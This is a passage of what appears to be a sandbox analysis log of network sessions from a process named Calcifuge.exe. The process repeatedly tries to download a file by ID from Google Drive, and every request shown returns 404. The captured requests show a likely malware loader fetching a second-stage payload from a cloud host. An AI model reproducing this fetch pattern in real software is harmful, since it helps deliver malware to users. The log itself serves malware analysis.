                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:52:50 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="n33K6mOe6IcELnQum-ylWA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              18 | 192.168.2.4 | 53500 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:52:50 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
2025-01-11 02:52:51 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:51 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: script-src 'nonce-YcVFwLTEvQRn3LP0DuVM4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 53511 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:52:51 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
2025-01-11 02:52:52 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgS65sHIKteAQRJ9OuA9iCRFVPNjinmraY1sYJfxIvygLGfD4ACUn8m9cnAQyZywgqkXtI_VfTI
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:52 GMT
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-Lv-tBs9R5wuFPTI0SI8jdA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
2025-01-11 02:52:52 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="hxJaqQVIpHaUfiEJNLlJpA">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.4 | 53518 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:52:53 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
2025-01-11 02:52:53 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:53 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-eTaXJPx1ygGd4IXWtvZ8Cg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.4 | 53527 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:52:54 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
2025-01-11 02:52:54 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgTrwjeKfxunfcpJKaKrbIAiGW4P1Ljr7ZJ7mQE08XtZhiDlTxy0WkAeWLnpEQgqPgdHx3RnLrM
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:54 GMT
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-zhkJkVePQUqbc-5bLKhEFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
2025-01-11 02:52:54 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wf8XNU49JbqQtRNTvvbn-Q">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.4 | 53534 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:52:55 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
2025-01-11 02:52:55 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:55 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'nonce-ihHNSiqNSAElHfq4oLH6Gw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 53544 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:52:56 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
2025-01-11 02:52:56 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgTaVSKliE-r_PVyofyaT3dnLYDHJSjWltWiBw5NU6NOgUV0Cs9ExVEHXHSxv9PUfiUTl04AoOU
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:56 GMT
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: script-src 'nonce-ecgEKlSzv5X6Zq2E2r8-ig' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:52:56 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="i5s6Revg5WwI-_A58Y6lkA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              24 | 192.168.2.4 | 53551 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:52:57 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:58 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:57 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'nonce-0qt7x32aFSZtZDH-WFv-hw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              25 | 192.168.2.4 | 53561 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:52:58 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:52:59 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgTtRmWoVRiINegPT1bfoYCWxBsFNdGTjoEKLeQodStgP6VJt-YkMw_H-7phXwDvVPP0bJsrDF8
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:52:58 GMT
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-ljTAyChWnrLer8c8jch8Fg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:52:59 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="2DnMM6VqBuOi_89SsFD27w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              26 | 192.168.2.4 | 53568 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:52:59 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:00 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:00 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
